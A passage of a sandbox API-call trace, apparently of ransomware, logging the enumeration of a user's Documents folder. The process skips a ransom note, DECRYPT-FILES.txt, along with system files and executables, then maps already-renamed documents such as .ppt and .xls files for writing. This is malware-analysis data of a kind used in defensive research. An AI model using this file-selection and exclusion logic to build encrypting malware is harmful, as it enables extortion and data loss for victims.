dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.867] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\*" [0184.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31e7f3f0, ftCreationTime.dwHighDateTime=0x1d4c9b7, ftLastAccessTime.dwLowDateTime=0xf0e43420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0e43420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0184.867] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.867] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31e7f3f0, ftCreationTime.dwHighDateTime=0x1d4c9b7, ftLastAccessTime.dwLowDateTime=0xf0e43420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0e43420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.867] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.867] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.867] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0e43420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0e43420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0e43420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.867] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.868] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.868] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.868] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.868] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.868] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.868] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.868] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.868] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.868] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\0a16c9.tmp" [0184.868] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.868] CloseHandle (hObject=0x0) returned 0 [0184.868] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.868] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e71a90, ftCreationTime.dwHighDateTime=0x1d4d19b, ftLastAccessTime.dwLowDateTime=0xb2070070, ftLastAccessTime.dwHighDateTime=0x1d4d14c, ftLastWriteTime.dwLowDateTime=0xae2624e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1168c, dwReserved0=0x0, dwReserved1=0x0, cFileName="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", cAlternateFileName="7XWNNG~1.ZUF")) returned 1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="DECRYPT-FILES.txt") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="autorun.inf") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="boot.ini") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="desktop.ini") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="ntuser.dat") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="iconcache.db") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="bootsect.bak") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="ntuser.dat.log") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="thumbs.db") returned -1 [0184.869] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.ppt.zuFUn6S", lpString2="Bootfont.bin") returned -1 [0184.869] lstrlenW (lpString="7xwnnge1dMI4u1n8p.ppt.zuFUn6S") returned 29 [0184.869] lstrcmpiW (lpString1="zuFUn6S", lpString2="lnk") returned 1 [0184.869] lstrcmpiW (lpString1="zuFUn6S", lpString2="exe") returned 1 [0184.869] lstrcmpiW (lpString1="zuFUn6S", lpString2="sys") returned 1 [0184.869] lstrcmpiW (lpString1="zuFUn6S", lpString2="dll") returned 1 [0184.869] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.869] lstrlenW (lpString="7xwnnge1dMI4u1n8p.ppt.zuFUn6S") returned 29 [0184.869] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.869] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="7xwnnge1dMI4u1n8p.ppt.zuFUn6S" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt.zuFUn6S") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt.zuFUn6S" [0184.869] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.869] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\7xwnnge1dMI4u1n8p.ppt.zuFUn6S" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\7xwnnge1dmi4u1n8p.ppt.zufun6s"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.870] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=71308) returned 1 [0184.870] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.870] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.880] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.880] CloseHandle (hObject=0x268) returned 1 [0184.880] CloseHandle (hObject=0x264) returned 1 [0184.880] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.880] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2624e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae2624e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae2624e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.880] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.880] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01ddc20, ftCreationTime.dwHighDateTime=0x1d4ce19, ftLastAccessTime.dwLowDateTime=0xf00389c0, ftLastAccessTime.dwHighDateTime=0x1d4d1b0, ftLastWriteTime.dwLowDateTime=0xae2ae7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZdoyBFOvdeUBph.odp.YP1CLFf", cAlternateFileName="DZDOYB~1.YP1")) returned 1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="DECRYPT-FILES.txt") returned 1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="autorun.inf") returned 1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="boot.ini") returned 1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="desktop.ini") returned 1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="ntuser.dat") returned -1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="iconcache.db") returned -1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="bootsect.bak") returned 1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="ntuser.dat.log") returned -1 [0184.880] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="thumbs.db") returned -1 [0184.881] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp.YP1CLFf", lpString2="Bootfont.bin") returned 1 [0184.881] lstrlenW (lpString="DZdoyBFOvdeUBph.odp.YP1CLFf") returned 27 [0184.881] lstrcmpiW (lpString1="YP1CLFf", lpString2="lnk") returned 1 [0184.881] lstrcmpiW (lpString1="YP1CLFf", lpString2="exe") returned 1 [0184.881] lstrcmpiW (lpString1="YP1CLFf", lpString2="sys") returned 1 [0184.881] lstrcmpiW (lpString1="YP1CLFf", lpString2="dll") returned 1 [0184.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.881] lstrlenW (lpString="DZdoyBFOvdeUBph.odp.YP1CLFf") returned 27 [0184.881] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.881] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="DZdoyBFOvdeUBph.odp.YP1CLFf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp.YP1CLFf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp.YP1CLFf" [0184.881] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp.YP1CLFf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\dzdoybfovdeubph.odp.yp1clff"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.881] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=72256) returned 1 [0184.881] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.881] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.913] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.913] CloseHandle (hObject=0x268) returned 1 [0184.913] CloseHandle (hObject=0x264) returned 1 [0184.913] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.913] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1388b720, ftCreationTime.dwHighDateTime=0x1d4ca23, ftLastAccessTime.dwLowDateTime=0x359d5b50, ftLastAccessTime.dwHighDateTime=0x1d4d23d, ftLastWriteTime.dwLowDateTime=0xae2d4900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ab9, dwReserved0=0x0, dwReserved1=0x0, cFileName="gtXCw8YOfxeWSlrp.xls.cQ6G", cAlternateFileName="GTXCW8~1.CQ6")) returned 1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="DECRYPT-FILES.txt") returned 1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="autorun.inf") returned 1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="boot.ini") returned 1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="desktop.ini") returned 1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="ntuser.dat") returned -1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="iconcache.db") returned -1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="bootsect.bak") returned 1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="ntuser.dat.log") returned -1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="thumbs.db") returned -1 [0184.913] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.xls.cQ6G", lpString2="Bootfont.bin") returned 1 [0184.913] lstrlenW (lpString="gtXCw8YOfxeWSlrp.xls.cQ6G") returned 25 [0184.913] lstrcmpiW (lpString1="cQ6G", lpString2="lnk") returned -1 [0184.913] lstrcmpiW (lpString1="cQ6G", lpString2="exe") returned -1 [0184.913] lstrcmpiW (lpString1="cQ6G", lpString2="sys") returned -1 [0184.913] lstrcmpiW (lpString1="cQ6G", lpString2="dll") returned -1 [0184.913] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.913] lstrlenW (lpString="gtXCw8YOfxeWSlrp.xls.cQ6G") returned 25 [0184.913] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.913] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="gtXCw8YOfxeWSlrp.xls.cQ6G" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls.cQ6G") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls.cQ6G" [0184.914] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls.cQ6G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\gtxcw8yofxewslrp.xls.cq6g"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.914] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=6841) returned 1 [0184.914] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.914] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.928] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.928] CloseHandle (hObject=0x268) returned 1 [0184.928] CloseHandle (hObject=0x264) returned 1 [0184.928] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.929] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe9fd0, ftCreationTime.dwHighDateTime=0x1d4d57c, ftLastAccessTime.dwLowDateTime=0x81423600, ftLastAccessTime.dwHighDateTime=0x1d4c925, ftLastWriteTime.dwLowDateTime=0xae320bc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4af9, dwReserved0=0x0, dwReserved1=0x0, cFileName="i2GfW.pptx.nZLlU", cAlternateFileName="I2GFWP~1.NZL")) returned 1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="DECRYPT-FILES.txt") returned 1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="autorun.inf") returned 1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="boot.ini") returned 1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="desktop.ini") returned 1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="ntuser.dat") returned -1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="iconcache.db") returned -1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="bootsect.bak") returned 1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="ntuser.dat.log") returned -1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="thumbs.db") returned -1 [0184.929] lstrcmpiW (lpString1="i2GfW.pptx.nZLlU", lpString2="Bootfont.bin") returned 1 [0184.929] lstrlenW (lpString="i2GfW.pptx.nZLlU") returned 16 [0184.929] lstrcmpiW (lpString1="nZLlU", lpString2="lnk") returned 1 [0184.929] lstrcmpiW (lpString1="nZLlU", lpString2="exe") returned 1 [0184.929] lstrcmpiW (lpString1="nZLlU", lpString2="sys") returned -1 [0184.929] lstrcmpiW (lpString1="nZLlU", lpString2="dll") returned 1 [0184.929] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.929] lstrlenW (lpString="i2GfW.pptx.nZLlU") returned 16 [0184.929] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.929] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="i2GfW.pptx.nZLlU" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx.nZLlU") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx.nZLlU" [0184.929] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx.nZLlU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\i2gfw.pptx.nzllu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.930] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=19193) returned 1 [0184.930] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.930] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.935] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.935] CloseHandle (hObject=0x268) returned 1 [0184.935] CloseHandle (hObject=0x264) returned 1 [0184.935] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.935] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f16700, ftCreationTime.dwHighDateTime=0x1d4c9c0, ftLastAccessTime.dwLowDateTime=0x85f33e70, ftLastAccessTime.dwHighDateTime=0x1d4cca8, ftLastWriteTime.dwLowDateTime=0xae392fe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x90c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ii_H.pptx.iYdHoHQ", cAlternateFileName="II_HPP~1.IYD")) returned 1 [0184.935] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="DECRYPT-FILES.txt") returned 1 [0184.935] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="autorun.inf") returned 1 [0184.935] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="boot.ini") returned 1 [0184.935] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="desktop.ini") returned 1 [0184.935] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="ntuser.dat") returned -1 [0184.935] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="iconcache.db") returned 1 [0184.935] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="bootsect.bak") returned 1 [0184.935] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="ntuser.dat.log") returned -1 [0184.936] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="thumbs.db") returned -1 [0184.936] lstrcmpiW (lpString1="ii_H.pptx.iYdHoHQ", lpString2="Bootfont.bin") returned 1 [0184.936] lstrlenW (lpString="ii_H.pptx.iYdHoHQ") returned 17 [0184.936] lstrcmpiW (lpString1="iYdHoHQ", lpString2="lnk") returned -1 [0184.936] lstrcmpiW (lpString1="iYdHoHQ", lpString2="exe") returned 1 [0184.936] lstrcmpiW (lpString1="iYdHoHQ", lpString2="sys") returned -1 [0184.936] lstrcmpiW (lpString1="iYdHoHQ", lpString2="dll") returned 1 [0184.936] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0184.936] lstrlenW (lpString="ii_H.pptx.iYdHoHQ") returned 17 [0184.936] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0184.936] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="ii_H.pptx.iYdHoHQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx.iYdHoHQ") 